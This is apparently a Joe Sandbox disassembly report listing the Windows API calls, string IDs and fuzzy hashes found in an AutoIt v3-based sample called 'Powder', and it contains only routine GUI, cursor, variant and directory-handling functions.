                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E02D19
                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E02D4C
                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E02D60
                                                  • GetClientRect.USER32(00000000,000000FF), ref: 00E02D7E
                                                  • GetStockObject.GDI32(00000011), ref: 00E02D9A
                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E02DA5
                                                    • Part of subcall function 00E02714: GetCursorPos.USER32(?), ref: 00E02727
                                                    • Part of subcall function 00E02714: ScreenToClient.USER32(00EC77B0,?), ref: 00E02744
                                                    • Part of subcall function 00E02714: GetAsyncKeyState.USER32(00000001), ref: 00E02769
                                                    • Part of subcall function 00E02714: GetAsyncKeyState.USER32(00000002), ref: 00E02777
                                                  • SetTimer.USER32(00000000,00000000,00000028,00E013C7), ref: 00E02DCC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                  • String ID: AutoIt v3 GUI$h
                                                  • API String ID: 1458621304-1309884394
                                                  • Opcode ID: c15c43fbe0a387f1686bf0aa55a5f9da96a1be8925410af104e7d9f0cafcc453
                                                  • Instruction ID: 81a3f0352f98c88f3d2ba3c6c3f24ebb97196e592811ffa27f0394e7e374731f
                                                  • Opcode Fuzzy Hash: c15c43fbe0a387f1686bf0aa55a5f9da96a1be8925410af104e7d9f0cafcc453
                                                  • Instruction Fuzzy Hash: 3BB16A71A0020A9FDB14DFA9CC89BAE7BB4FB48314F10512AFA15B62D0DB70E891CF54
                                                  APIs
                                                    • Part of subcall function 00E11821: _memmove.LIBCMT ref: 00E1185B
                                                  • GetForegroundWindow.USER32(00E90980,?,?,?,?,?), ref: 00E204E3
                                                  • IsWindow.USER32(?), ref: 00E566BB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Window$Foreground_memmove
                                                  • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                  • API String ID: 3828923867-1919597938
                                                  • Opcode ID: bf6cddc37981c6ec3c970a4e84812cf1971039e683d422f69ae375b7fddde787
                                                  • Instruction ID: cfa5f1ebd55f754995d79fe160d31eee55cfe61053a845c4b5a43fb8fa9f8526
                                                  • Opcode Fuzzy Hash: bf6cddc37981c6ec3c970a4e84812cf1971039e683d422f69ae375b7fddde787
                                                  • Instruction Fuzzy Hash: DDD1A1301042029FCB04EF20D44199AFBF5BF94349F546A2AF856776A2DB70E99DCB92
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 00E844AC
                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00E8456C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: BuffCharMessageSendUpper
                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                  • API String ID: 3974292440-719923060
                                                  • Opcode ID: b83c9655e7220e6beb36cbec77e8d765ad4e40a2b7adffadf60606396d91030c
                                                  • Instruction ID: 1bc10523aa71676ce2bd6391de4afc8ed60cdeb45b589ae45812148e3ce6a39c
                                                  • Opcode Fuzzy Hash: b83c9655e7220e6beb36cbec77e8d765ad4e40a2b7adffadf60606396d91030c
                                                  • Instruction Fuzzy Hash: 92A170B02142129FCB14FF20C951AAAB3E5FF85314F146969F89A7B2D2DB31ED05CB51
                                                  APIs
                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00E756E1
                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 00E756EC
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00E756F7
                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00E75702
                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 00E7570D
                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 00E75718
                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 00E75723
                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00E7572E
                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00E75739
                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 00E75744
                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00E7574F
                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00E7575A
                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 00E75765
                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00E75770
                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 00E7577B
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00E75786
                                                  • GetCursorInfo.USER32(?), ref: 00E75796
                                                  • GetLastError.KERNEL32(00000001,00000000), ref: 00E757C1
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Cursor$Load$ErrorInfoLast
                                                  • String ID:
                                                  • API String ID: 3215588206-0
                                                  • Opcode ID: b9079e35c9d25788477adb75022335858beff707166976a768696f21206a5b1e
                                                  • Instruction ID: 5771fff2007ecc6267162b53ea44d3b5b408f4b9e5ee09c85ae6ecc15b447c74
                                                  • Opcode Fuzzy Hash: b9079e35c9d25788477adb75022335858beff707166976a768696f21206a5b1e
                                                  • Instruction Fuzzy Hash: E9415371E04319AADB109FBA9C49D6EFFF8EF51B10B10452FE519F7290DAB8A400CE91
                                                  APIs
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00E5B17B
                                                  • __swprintf.LIBCMT ref: 00E5B21C
                                                  • _wcscmp.LIBCMT ref: 00E5B22F
                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E5B284
                                                  • _wcscmp.LIBCMT ref: 00E5B2C0
                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00E5B2F7
                                                  • GetDlgCtrlID.USER32(?), ref: 00E5B349
                                                  • GetWindowRect.USER32(?,?), ref: 00E5B37F
                                                  • GetParent.USER32(?), ref: 00E5B39D
                                                  • ScreenToClient.USER32(00000000), ref: 00E5B3A4
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00E5B41E
                                                  • _wcscmp.LIBCMT ref: 00E5B432
                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00E5B458
                                                  • _wcscmp.LIBCMT ref: 00E5B46C
                                                    • Part of subcall function 00E2385C: _iswctype.LIBCMT ref: 00E23864
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                  • String ID: %s%u
                                                  • API String ID: 3744389584-679674701
                                                  • Opcode ID: 4005f4f9900a5d217ee03a3c9db1af6a5fb036b546f5cac038f476384bdf2096
                                                  • Instruction ID: eed2ca7790c18c11d8d72df3ed14a356ee3a01b5e3c0270030d1bf7b634139a9
                                                  • Opcode Fuzzy Hash: 4005f4f9900a5d217ee03a3c9db1af6a5fb036b546f5cac038f476384bdf2096
                                                  • Instruction Fuzzy Hash: 64A1E371204716AFD718DF20C884BEAB7E8FF4435AF00591AFDA9E2191E730E959CB90
                                                  APIs
                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 00E5BAB1
                                                  • _wcscmp.LIBCMT ref: 00E5BAC2
                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 00E5BAEA
                                                  • CharUpperBuffW.USER32(?,00000000), ref: 00E5BB07
                                                  • _wcscmp.LIBCMT ref: 00E5BB25
                                                  • _wcsstr.LIBCMT ref: 00E5BB36
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00E5BB6E
                                                  • _wcscmp.LIBCMT ref: 00E5BB7E
                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 00E5BBA5
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00E5BBEE
                                                  • _wcscmp.LIBCMT ref: 00E5BBFE
                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 00E5BC26
                                                  • GetWindowRect.USER32(00000004,?), ref: 00E5BC8F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                  • String ID: @$ThumbnailClass
                                                  • API String ID: 1788623398-1539354611
                                                  • Opcode ID: 13776ccb4bc8afdb1c4b73baac471af2bd83cd68a6dde857fb39a6efb40a33b6
                                                  • Instruction ID: 5d85974b11f78a543960cac537e0b1ce6b2dc16a366cfed98b06c6c0eafd6904
                                                  • Opcode Fuzzy Hash: 13776ccb4bc8afdb1c4b73baac471af2bd83cd68a6dde857fb39a6efb40a33b6
                                                  • Instruction Fuzzy Hash: EB81C2710043099FDB05DF14C885FAAB7E8FF44319F14A86AFD89AA096EB34DD49CB61
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                  • API String ID: 1038674560-1810252412
                                                  • Opcode ID: c2f8bbcf8818664debcaad1e2e39cc64fbdd809aa36f039cb9da5e4d3d6c93bc
                                                  • Instruction ID: b76bc90b146759ea3d4f22485f06d16362dab07f3179adc7d4e0c528d3de7f7e
                                                  • Opcode Fuzzy Hash: c2f8bbcf8818664debcaad1e2e39cc64fbdd809aa36f039cb9da5e4d3d6c93bc
                                                  • Instruction Fuzzy Hash: 7331E174A44315A6CF14EB60DD43EEEB3E4AF10391F24253AFA41B10E6EF656E48C692
                                                  APIs
                                                  • LoadIconW.USER32(00000063), ref: 00E5CBAA
                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E5CBBC
                                                  • SetWindowTextW.USER32(?,?), ref: 00E5CBD3
                                                  • GetDlgItem.USER32(?,000003EA), ref: 00E5CBE8
                                                  • SetWindowTextW.USER32(00000000,?), ref: 00E5CBEE
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00E5CBFE
                                                  • SetWindowTextW.USER32(00000000,?), ref: 00E5CC04
                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E5CC25
                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E5CC3F
                                                  • GetWindowRect.USER32(?,?), ref: 00E5CC48
                                                  • SetWindowTextW.USER32(?,?), ref: 00E5CCB3
                                                  • GetDesktopWindow.USER32 ref: 00E5CCB9
                                                  • GetWindowRect.USER32(00000000), ref: 00E5CCC0
                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00E5CD0C
                                                  • GetClientRect.USER32(?,?), ref: 00E5CD19
                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00E5CD3E
                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E5CD69
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                  • String ID:
                                                  • API String ID: 3869813825-0
                                                  • Opcode ID: 719cf547eefefa6c0f67f62ce7441f5a89a958af206f31efe297c623604c9021
                                                  • Instruction ID: 6f35e5b033b16afcb3c190267343b9c389c19ff68a41b122ab80277f7cef022b
                                                  • Opcode Fuzzy Hash: 719cf547eefefa6c0f67f62ce7441f5a89a958af206f31efe297c623604c9021
                                                  • Instruction Fuzzy Hash: 8E518E31900709AFDB20DFA9CE89B6EBBF5FF44709F100919E986B25A0D770A918CF50
                                                  APIs
                                                  • _memset.LIBCMT ref: 00E8A87E
                                                  • DestroyWindow.USER32(00000000,?), ref: 00E8A8F8
                                                    • Part of subcall function 00E11821: _memmove.LIBCMT ref: 00E1185B
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E8A972
                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E8A994
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E8A9A7
                                                  • DestroyWindow.USER32(00000000), ref: 00E8A9C9
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E00000,00000000), ref: 00E8AA00
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E8AA19
                                                  • GetDesktopWindow.USER32 ref: 00E8AA32
                                                  • GetWindowRect.USER32(00000000), ref: 00E8AA39
                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E8AA51
                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E8AA69
                                                    • Part of subcall function 00E029AB: GetWindowLongW.USER32(?,000000EB), ref: 00E029BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                  • String ID: 0$tooltips_class32
                                                  • API String ID: 1297703922-3619404913
                                                  • Opcode ID: 18bf5a8441ad83cf0893e07161e5afe26ec07f0824be566a4660d81f904de3c4
                                                  • Instruction ID: 9b5a7744869e31804546dc458e2d72f88e8b0e16833528448e7af980ecd0511a
                                                  • Opcode Fuzzy Hash: 18bf5a8441ad83cf0893e07161e5afe26ec07f0824be566a4660d81f904de3c4
                                                  • Instruction Fuzzy Hash: 9771CC71144200AFE729DF28CC49FAB77E5FB88304F48056EF989A72A1D775E906CB52
                                                  APIs
                                                    • Part of subcall function 00E029E2: GetWindowLongW.USER32(?,000000EB), ref: 00E029F3
                                                  • DragQueryPoint.SHELL32(?,?), ref: 00E8CCCF
                                                    • Part of subcall function 00E8B1A9: ClientToScreen.USER32(?,?), ref: 00E8B1D2
                                                    • Part of subcall function 00E8B1A9: GetWindowRect.USER32(?,?), ref: 00E8B248
                                                    • Part of subcall function 00E8B1A9: PtInRect.USER32(?,?,00E8C6BC), ref: 00E8B258
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00E8CD38
                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E8CD43
                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E8CD66
                                                  • _wcscat.LIBCMT ref: 00E8CD96
                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E8CDAD
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00E8CDC6
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00E8CDDD
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00E8CDFF
                                                  • DragFinish.SHELL32(?), ref: 00E8CE06
                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00E8CEF9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                  • API String ID: 169749273-3440237614
                                                  • Opcode ID: 9cf71027db8d38fb4812b31e183f3d5f26756839e79725816a122c89497c73df
                                                  • Instruction ID: bbf96ef28d494fb18bfbfb5a8e6b07201417097820177bc7cd27edc0fef1c95f
                                                  • Opcode Fuzzy Hash: 9cf71027db8d38fb4812b31e183f3d5f26756839e79725816a122c89497c73df
                                                  • Instruction Fuzzy Hash: 88619E71108301AFC701EF50DC85D9FBBE8EFC9750F101A2EF699A21A1DB319A49CB62
                                                  APIs
                                                  • VariantInit.OLEAUT32(00000000), ref: 00E6831A
                                                  • VariantCopy.OLEAUT32(00000000,?), ref: 00E68323
                                                  • VariantClear.OLEAUT32(00000000), ref: 00E6832F
                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00E6841D
                                                  • __swprintf.LIBCMT ref: 00E6844D
                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 00E68479
                                                  • VariantInit.OLEAUT32(?), ref: 00E6852A
                                                  • SysFreeString.OLEAUT32(?), ref: 00E685BE
                                                  • VariantClear.OLEAUT32(?), ref: 00E68618
                                                  • VariantClear.OLEAUT32(?), ref: 00E68627
                                                  • VariantInit.OLEAUT32(00000000), ref: 00E68665
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                  • API String ID: 3730832054-3931177956
                                                  • Opcode ID: 290b81d9fd603241708fd708c4715c5deda061ecf8f3ee227e1951a238253968
                                                  • Instruction ID: bd79d368c09cb8804f0b7ee77eca218188f2161ad987ac9511e43c84279b6c11
                                                  • Opcode Fuzzy Hash: 290b81d9fd603241708fd708c4715c5deda061ecf8f3ee227e1951a238253968
                                                  • Instruction Fuzzy Hash: 1CD10271684615DFDB209F61EA84BAEB7F4BF04B80F14A256E415BB281CF30EC40DBA1
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 00E84A61
                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E84AAC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: BuffCharMessageSendUpper
                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                  • API String ID: 3974292440-4258414348
                                                  • Opcode ID: d2629ad6b8d6db172d136b0f24b1f80c6e6cc5c1ed6f0c9baa7938ea6637da42
                                                  • Instruction ID: 2eea0054ed9cb3487069a018f26d31231480f5b24d9b45dbc9acf787dc0055db
                                                  • Opcode Fuzzy Hash: d2629ad6b8d6db172d136b0f24b1f80c6e6cc5c1ed6f0c9baa7938ea6637da42
                                                  • Instruction Fuzzy Hash: 379180B02047129FCB04EF10C451AAAB7E5EF94354F14A959F89A7B3E2DB31ED49CB81
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?), ref: 00E6E31F
                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E6E32F
                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E6E33B
                                                  • __wsplitpath.LIBCMT ref: 00E6E399
                                                  • _wcscat.LIBCMT ref: 00E6E3B1
                                                  • _wcscat.LIBCMT ref: 00E6E3C3
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E6E3D8
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00E6E3EC
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00E6E41E
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00E6E43F
                                                  • _wcscpy.LIBCMT ref: 00E6E44B
                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00E6E48A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
